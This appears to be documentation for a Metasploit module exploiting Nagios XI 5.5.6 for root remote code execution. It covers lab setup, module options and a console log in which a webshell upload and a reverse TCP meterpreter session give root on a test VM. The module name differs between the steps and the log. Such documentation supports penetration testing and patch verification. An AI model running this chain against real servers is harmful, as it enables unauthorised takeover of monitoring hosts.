# Vulnerable Application

Nagios XI 5.5.6 Root Remote Code Execution

The exploit works as follows:

- A local HTTPS server is setup. When it is reached, this server responds with a payload.
- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (except if the Nagios server is in the same network as yours obviously), this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
- A command is executed thanks to the webshell. This command elevates privileges and run the meterpreter executable, giving us a meterpreter session.

# Creating A Testing Environment

- Install a Ubuntu Linux LTS (I used 18.04 LTS for my tests) in a VM.
- Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
- Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).

# Verification Steps

1. `use exploit/linux/http/nagios_xi_root_rce`
2. `set RHOSTS [IP]`
3. `set RSRVHOST [IP]`
4. `exploit`

A meterpreter session should have been opened successfully and you should be root

# Options

## RSRVHOST

IP at which your local HTTPS can be reached. Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).

## RSRVPORT

Port that will forward to your local HTTPS server.

## SRVHOST

IP of your local HTTPS server (must be a local IP).

## SRVPORT

Port to listen to for your local HTTPS server.

# Scenarios

## Nagios 5.5.6 on Ubuntu 18.04 LTS

```
msf5 exploit(linux/http/nagios_xi_magpie_debug) > show options

Module options (exploit/linux/http/nagios_xi_magpie_debug):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  5                no        Number of seconds the web server will wait before termination
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.135.129   yes       The target address range or CIDR identifier
   RPORT      443              yes       The target port (TCP)
   RSRVHOST   172.16.135.1     yes       A public IP at which your host can be reached (e.g. your router IP)
   RSRVPORT   8080             yes       The port that will forward to the local HTTPS server
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.135.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Nagios XI 5.5.6


msf5 exploit(linux/http/nagios_xi_magpie_debug) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.135.1:4444 
msf5 exploit(linux/http/nagios_xi_magpie_debug) > [*] Using URL: https://0.0.0.0:8080/ixFonv2
[*] Local IP: https://192.168.0.21:8080/ixFonv2
[*] Server started.
[*] nZOnJhGnMb.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/mTwEwHtAuz0V
[*] Local IP: https://192.168.0.21:8080/mTwEwHtAuz0V
[*] Server started.
[*] SQmBobwBzw uploaded with success!
[*] Sending stage (985320 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:33090) at 2019-06-25 16:13:01 -0500
[+] Deleted /usr/local/nagvis/share/nZOnJhGnMb.php
[+] Deleted /usr/local/nagvis/share/SQmBobwBzw
[!] This exploit may require manual cleanup of '/var/tmp/mtrhbwFZHa.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.135.129
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
